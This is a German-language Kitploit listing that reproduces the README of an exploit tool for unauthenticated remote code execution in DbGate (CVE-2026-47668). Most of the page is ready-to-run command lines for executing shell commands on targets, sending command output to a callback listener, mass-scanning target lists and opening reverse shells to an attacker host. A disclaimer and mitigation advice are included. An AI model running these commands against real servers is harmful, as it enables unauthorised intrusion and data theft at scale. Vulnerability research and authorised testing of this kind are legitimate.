Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

Repository anzeigen
6vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-47668 — DbGate Remote Code Execution

Nicht authentifizierte RCE im DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Assessment-Tool: CVE-2026-47668.py — nur für autorisierte Tests.

CVECVE-2026-47668
SchweregradKritisch
ProduktDbGate / dbgate-serve
Betroffen≤ 7.1.8
Behoben≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Schwachstelle

Titel: Nicht authentifizierte RCE in DbGate über JSON Script Runner

Vom Benutzer steuerbare Felder (functionName, variableName) werden ohne ordnungsgemäße Validierung in dynamisch generiertes JavaScript eingebettet. Ein Angreifer kann beliebigen Code im Node.js-Runner-Unterprozess ausführen.

Gegenmaßnahme: Upgrade auf 7.1.9+. Netzwerkzugriff einschränken, anonyme Authentifizierung deaktivieren, Anmeldeinformationen rotieren, Protokolle auf verdächtige /runners/start-Aktivitäten prüfen.


Kontakt

Telegram: @KNxploited


Tool-Übersicht

CVE-2026-47668.py prüft und validiert die Ausnutzung gegen DbGate-Instanzen, die Sie autorisiert sind zu testen.

Modi

Ergebnisse

Ausgabeverzeichnis: Nx/ (vuln, dispatch, exfil, failed, list_report, Dateien pro Ziel unter exfil/)


Installation

root@kitploit:~
pip install -r requirements.txt

Erfordert: Python 3.9+, aiohttp, colorama


Verwendung

AUTO-Assistent (Standard — keine Reverse Shell)

root@kitploit:~
python CVE-2026-47668.py
Eingabe an der EingabeaufforderungBeispiel
Einzelne URLhttp://192.168.1.10:3000
URL + Befehlhttp://192.168.1.10:3000|id
Ziellistetargets.txt

CLI — Flag aktivieren

Jeder CLI-Lauf muss --cli enthalten.

root@kitploit:~
python CVE-2026-47668.py --cli [options]

Einzelnes Ziel

-u / --url — Basis-URL des Ziels

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — Shell-Befehl (Standard: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — nur Schwachstellenprobe (kein Befehl)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — Injektionsvektor: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — Standardport, wenn die URL keinen Port enthält (Standard: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — vorhandenes Bearer-Token verwenden

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — benutzerdefinierter Login-Body (Standard: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — HTTP-Timeout in Sekunden

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — TLS-Zertifikate verifizieren

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / Exfil (Standard im CLI mit --cmd)

--callback-host — IP/Hostname, die das Ziel verwendet, um Ihren Listener zu erreichen

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — lokale Bindung für HTTP-Listener (Standard: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — HTTP-Exfil-Port (Standard: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — externe Callback-URL (deaktiviert integrierten Listener)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — Sekunden auf Callback warten (einzelnes Ziel, Standard: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — Ausgabe ohne Base64-Kodierung senden

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — asynchrones exec anstelle von execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Massen-Scan (keine Reverse Shell)

-f / --file — Datei mit Zielliste

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — parallele Worker (Standard: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — Callback-Wartezeit pro Ziel im Massenmodus (Standard: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Massenmodus + benutzerdefinierter Standardport

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Reverse Shell (optional — nur einzelnes Ziel)

Nicht erforderlich für normale Tests. Verwenden Sie HTTP-Exfil (--cmd) als Nachweis.

--reverse-shell — Ziel verbindet sich mit LHOST:LPORT (Wert weglassen = LAN-IP + Port 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — Port, wenn --reverse-shell kein :port enthält

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — lokale Listen-Adresse

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — auf TCP warten (Standard: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — einfache stdin/stdout-Weiterleitung nach Verbindung

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Docker-Hinweis: Verwenden Sie eine IP, die aus dem DbGate-Container erreichbar ist (z. B. Host-Gateway), nicht nur 127.0.0.1 auf Ihrem PC.


Zielliste (targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Kein Port → 3000 wird automatisch angewendet
  • host|command → Befehlsüberschreibung pro Zeile
  • Bericht: Nx/list_report.txt

Ausgabedateien


Arbeitsablauf

  1. POST /auth/login → Bearer-Token (automatisch, außer bei --token)
  2. Probe → Runner akzeptiert Injektion
  3. POST /runners/start → Befehl ausführen + HTTP-Callback (oder Reverse-TCP, falls aktiviert)
  4. Klassifizieren → EXFIL = bestätigte Ausgabe

Haftungsausschluss

Nur für autorisierte Sicherheitstests. Sie müssen eine ausdrückliche Genehmigung haben, um ein System zu testen. Der Autor ist nicht verantwortlich für Missbrauch oder illegale Nutzung.


Von: Nxploited

Tool herunterladen
ElementDetail
EndpunktPOST /runners/start
AuthentifizierungBearer erforderlich; Token kann über POST /auth/login bei anonymen/Standard-Bereitstellungen bezogen werden
InjektionfunctionName, variableName in JSON-assign-Befehlen
AuswirkungAusführung von Betriebssystembefehlen als DbGate-Prozessbenutzer
ModusReverse ShellBeschreibung
AUTONeinEin Prompt; Token + HTTP-Callback + Standardwerte
CLIOptionalVolle Kontrolle über Flags
MassenmodusNeinScan von targets.txt
--reverse-shellJaOptionale TCP-Überprüfung (nur einzelnes Ziel)
ErgebnisBedeutung
FAILNicht erreichbar, Authentifizierung fehlgeschlagen oder nicht verwundbar
VULNRunner hat nur den Probe akzeptiert
DISPATCHPayload gesendet; keine bestätigte Ausgabe
EXFILCallback empfangen — bestätigte Befehlsausgabe
REVSHReverse-TCP verbunden (nur optionaler Modus)
DateiInhalt
Nx/vuln.txtVerwundbare Ziele (Probe OK)
Nx/dispatch.txtPayload gesendet, unbestätigt
Nx/exfil.txtBestätigte Callbacks
Nx/failed.txtFehlgeschlagene Ziele
Nx/exfil/<host>.txtBefehlsausgabe pro Ziel
Nx/sessions/<id>/summary.jsonSitzungsübersicht